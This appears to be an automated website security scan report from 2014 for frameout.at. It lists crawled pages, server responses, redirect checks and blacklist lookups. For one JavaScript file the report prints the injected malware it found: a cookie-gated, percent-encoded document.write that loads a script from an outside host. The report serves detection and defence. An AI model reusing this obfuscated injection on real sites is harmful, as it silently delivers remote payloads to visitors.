Scanned pages/files
Request | Server response | Status |
http://frameout.at/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:28 GMT Location: http://frameout.at/pages.php?m=0 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages.php?m=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:28 GMT Location: pages/home.php?m=1&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/home.php?m=1&s= | 200 OK Content-Length: 10756 Content-Type: text/html | clean |
http://frameout.at/pages/../lp_cms/includes/lp_list.js | 200 OK Content-Length: 17556 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var selectedGridTr="";
function disableSubs(val,tgtval,preselect) { TargetID = "lp_data"+tgtval; el=document.getElementById(TargetID); el.options.length=null; val = parseInt(val); switch (val) { case 1: enableArr = new Array(1,2,3,4,5,6,8); break; case 2: enableArr = new Array(); enableArr.push(7); break; case 3: enableArr = new Array(9,10); break; case 4: enableArr if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
Antivirus reports:
http://frameout.at/pages.php?lng=&m=10 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/impressum.php?m=10&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/impressum.php?m=10&s= | 200 OK Content-Length: 7650 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/home.php?m=1&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/programm%202014.php?m=19&s= Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s= | 200 OK Content-Length: 8117 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=75 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:30 GMT Location: pages/programm%202014.php?m=19&s=75 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=75 | 200 OK Content-Length: 10078 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=76 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=76 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=76 | 200 OK Content-Length: 9699 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=77 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=77 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=77 | 200 OK Content-Length: 13662 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=78 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:31 GMT Location: pages/programm%202014.php?m=19&s=78 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=78 | 200 OK Content-Length: 9412 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=79 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=79 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=79 | 200 OK Content-Length: 10500 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=80 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=80 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=80 | 200 OK Content-Length: 8541 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=81 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=81 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=81 | 200 OK Content-Length: 11269 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=82 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:32 GMT Location: pages/programm%202014.php?m=19&s=82 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=82 | 200 OK Content-Length: 8408 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=83 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:33 GMT Location: pages/programm%202014.php?m=19&s=83 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=83 | 200 OK Content-Length: 10930 Content-Type: text/html | clean |
http://frameout.at/pages.php?lng=&m=19&s=84 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 09 Oct 2014 09:44:33 GMT Location: pages/programm%202014.php?m=19&s=84 Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://frameout.at/pages/programm%202014.php?m=19&s=84 | 200 OK Content-Length: 9917 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frameout.at
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 09 Oct 2014 09:44:28 GMT
Location: http://frameout.at/pages.php?m=0
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frameout.at
Referer: http://www.google.com/search?q=frameout.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frameout.at
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frameout.at/
Result: frameout.at is not infected or malware details are not published yet.